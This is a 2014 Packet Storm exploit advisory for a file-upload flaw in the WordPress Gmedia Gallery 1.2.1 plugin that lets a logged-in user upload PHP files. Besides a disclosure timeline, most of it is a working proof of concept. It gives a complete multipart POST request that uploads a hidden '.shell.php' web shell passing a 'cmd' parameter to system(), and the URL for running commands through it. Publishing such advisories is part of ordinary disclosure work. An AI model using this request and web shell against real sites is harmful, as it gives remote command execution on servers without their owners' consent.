WordPress Gmedia Gallery 1.2.1 Shell Upload

2014-08-03T00:00:00
ID PACKETSTORM:127725
Type packetstorm
Reporter Claudio Viviani
Modified 2014-08-03T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability  
  
# Exploit Author : Claudio Viviani  
  
# Vendor Homepage : http://www.codeasily.com/  
  
# Software Link : http://downloads.wordpress.org/plugin/grand-media.zip  
  
# Date : 2014-08-01  
  
# Tested on : Windows 7 / Mozilla Firefox  
  
######################  
  
# Description :   
  
Any user could upload php files (administrator by default).  
  
######################  
  
# Vulnerability Disclosure Timeline:  
  
2014-08-01: Discovered vulnerability  
2014-08-01: Vendor Notification (Twitter)  
2014-08-01: Vendor Response/Feedback   
2014-08-02: Vendor Fix/Patch   
2014-08-02: Public Disclosure   
  
######################  
  
# PoC:  
  
POST  
Host=127.0.0.1  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding=gzip, deflate  
Referer=http://127.0.0.1/wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia  
Content-Length=916  
Content-Type=multipart/form-data; boundary=---------------------------304431219031197  
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840  
Connection=keep-alive  
Pragma=no-cache  
Cache-Control=no-cache  
POSTDATA =-----------------------------304431219031197  
Content-Disposition: form-data; name="name"  
  
.shell.php  
-----------------------------304431219031197  
Content-Disposition: form-data; name="chunk"  
  
0  
-----------------------------304431219031197  
Content-Disposition: form-data; name="chunks"  
  
1  
-----------------------------304431219031197  
Content-Disposition: form-data; name="params"  
  
terms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D=  
-----------------------------304431219031197  
Content-Disposition: form-data; name="file"; filename=".shell.php"  
Content-Type: application/octet-stream  
  
<?php  
  
if(isset($_REQUEST['cmd'])){  
echo "<pre>";  
$cmd = ($_REQUEST['cmd']);  
system($cmd);  
echo "</pre>";  
die;  
}  
  
?>  
  
  
  
-----------------------------304431219031197--  
  
  
Backdoor location:  
  
http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd  
  
  
#####################  
  
Discovered By : Claudio Viviani  
http://www.homelab.it  
info@homelab.it  
homelabit@protonmail.ch  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
  
#####################  
`